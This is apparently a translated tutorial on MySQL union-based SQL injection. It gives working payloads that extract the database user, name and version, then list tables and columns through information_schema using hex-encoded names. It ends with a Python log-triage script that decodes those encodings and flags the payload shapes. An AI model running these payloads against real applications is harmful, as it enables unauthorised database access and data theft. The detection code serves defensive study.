The MySQL injection statements here apply only to this type of statement:

    order by XX
    union select .....

    1' UNION SELECT 1, CONCAT(user(), 0x3a, database(), 0x3a, version()) #

The following statement is equivalent to the one above:

    1' UNION SELECT 1, CONCAT_WS(CHAR(58), user(), database(), version()) #

Both statements are for a character (string) type parameter, and the comment character is #. CONCAT_WS concatenates strings with a separator, which is given as its first argument.

Obtaining information such as the database

    1' UNION SELECT 1, concat(table_name) from information_schema.tables where table_schema = database() #

concat is only used for string concatenation and can be omitted here; all the tables are output either way. table_name and table_schema are fields of the tables table in information_schema.

    1' UNION SELECT 1, concat(column_name) from information_schema.columns where table_name = 0x7573657273 #

0x7573657273 is the hexadecimal representation of users. The users table is just one particular case.

Query the field values based on the table obtained above. At this point the database, the table and the table's fields are all known. Nothing else needs to be looked up; perform the union query directly.

The tables table in information_schema contains table_schema (database name) and table_name (table name). The columns table in information_schema contains table_name (table name) and column_name (column name).

It does not matter if order by shows that only one of the two fields can be displayed. You can use concat, for example concat(field, 0x3a, field), to display the two fields together. The 0x3a in the middle is the hexadecimal representation of ":".
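The statements above hide the table name and the separator behind a hex literal and CHAR(), which also hides them from anyone reading request logs. The following is an added example, not part of the original page: a small log-triage helper that decodes both encodings and flags the statement shapes described here. The function names, indicator names and sample values are constructed for illustration.

```python
import re

# MySQL hex string literals (0x7573657273) and CHAR(58)-style calls.
HEX_LITERAL = re.compile(r"\b0x((?:[0-9a-fA-F]{2})+)\b")
CHAR_CALL = re.compile(r"\bCHAR\s*\(\s*(\d+(?:\s*,\s*\d+)*)\s*\)", re.I)
INDICATORS = {  # statement shapes from this page, matched after decoding
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "information_schema": re.compile(r"\binformation_schema\s*\.\s*(?:tables|columns)\b", re.I),
    "context_functions": re.compile(r"\b(?:user|database|version)\s*\(\s*\)", re.I),
    "trailing_comment": re.compile(r"(?:#|--\s)\s*$"),
}

def _hex_to_text(match):
    # Show a hex literal as quoted text when it decodes to printable UTF-8.
    try:
        text = bytes.fromhex(match.group(1)).decode("utf-8")
    except UnicodeDecodeError:
        return match.group(0)
    return repr(text) if text.isprintable() else match.group(0)

def _char_to_text(match):
    # Show CHAR(n, ...) as quoted text when every code is printable ASCII.
    codes = [int(c) for c in match.group(1).split(",")]
    ok = all(32 <= c <= 126 for c in codes)
    return repr("".join(map(chr, codes))) if ok else match.group(0)

def normalize(value):
    # Decode both encodings so hidden names and separators become readable.
    return CHAR_CALL.sub(_char_to_text, HEX_LITERAL.sub(_hex_to_text, value))

def analyze(value):
    # Return (normalized value, sorted indicator names) for one parameter.
    normalized = normalize(value)
    hits = {name for name, rx in INDICATORS.items() if rx.search(normalized)}
    if normalized != value:
        hits.add("encoded_literal")
    return normalized, sorted(hits)

# Constructed sample parameter values, as they might appear in a request log.
SAMPLE_PARAMS = [
    "O'Brien",
    "1' UNION SELECT 1, CONCAT_WS(CHAR(58), user(), database(), version()) #",
    "1' UNION SELECT 1, concat(column_name) from information_schema.columns "
    "where table_name = 0x7573657273 #",
]

if __name__ == "__main__":
    for raw in SAMPLE_PARAMS:
        print(analyze(raw))
```

A lone quote such as the one in O'Brien produces no indicators, so alerting on a combination of indicators keeps ordinary input from being flagged.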